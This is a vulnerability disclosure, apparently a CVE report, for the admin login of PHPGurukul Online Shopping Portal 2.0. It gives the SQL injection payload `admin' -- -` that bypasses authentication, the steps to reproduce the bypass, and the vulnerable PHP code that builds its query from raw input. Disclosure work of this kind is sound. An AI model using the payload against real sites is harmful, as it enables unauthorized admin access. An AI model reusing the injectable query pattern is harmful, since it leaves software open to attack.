PHPGurukul Online Shopping Portal Project 2.0 CVE-Report

# PHPGurukul Online Shopping Portal Project 2.0 - SQL Injection Vulnerability at admin login page in [`/shopping/admin/index.php`] **Exploit Title:** `PHPGurukul Online Shopping Portal Project 2.0 - SQL Injection` **Exploit Author:** `SeaWind` **Vendor Homepage:** `https://phpgurukul.com/` **Software Link:** `https://phpgurukul.com/shopping-portal-free-download/` **Version:** `2.0` **Vulnerable endpoint:** `http://localhost/shopping/admin/index.php ` **Tested on :** `Windows 11, XAMPP` ## Description and Impact - In admin login page (`http://localhost/shopping/admin/index.php` ) an SQL Injection vulnerability was found at `username` parameter. This will allow attackers to access the admin panel page (for example `http://localhost:88/admin/todays-orders.php`) without any permission. ## Step to reproduce - First visit page `http://localhost/shopping/admin/index.php` ![image](https://hackmd.io/_uploads/S167wAfAA.png) - Then at `username` parameter, add `admin' -- -` as the payload and in the `password` parameter, fill out with anything. In my example, I will fill `username` parameter with payload `admin' -- -` and `123` as the payload for `password` parameter ![image](https://hackmd.io/_uploads/H1QeYAMRA.png) - Finally click `login` button, and with that, I was able to login to admin panel page without knowing the real password ![image](https://hackmd.io/_uploads/Sky4YCzAR.png) ## Root Cause Analysis ```php!= <?php session_start(); error_reporting(0); include("include/config.php"); if(isset($_POST['submit'])) { $username=$_POST['username']; $password=md5($_POST['password']); $ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$username' and password='$password'"); $num=mysqli_fetch_array($ret); if($num>0) { $extra="change-password.php"; $_SESSION['alogin']=$_POST['username']; $_SESSION['id']=$num['id']; header("location:change-password.php"); exit(); } else { $_SESSION['errmsg']="Invalid username or password"; header("location:index.php"); exit(); } } ?> ``` - This is the source code for user login in `/shopping/admin/index.php`. In the line 9 of the code, the query `SELECT * FROM admin WHERE username='$username' and password='$password'` doesn't have any validation or variable check before passing to this query at `$username` variable make it vulnerable to SQL Injection.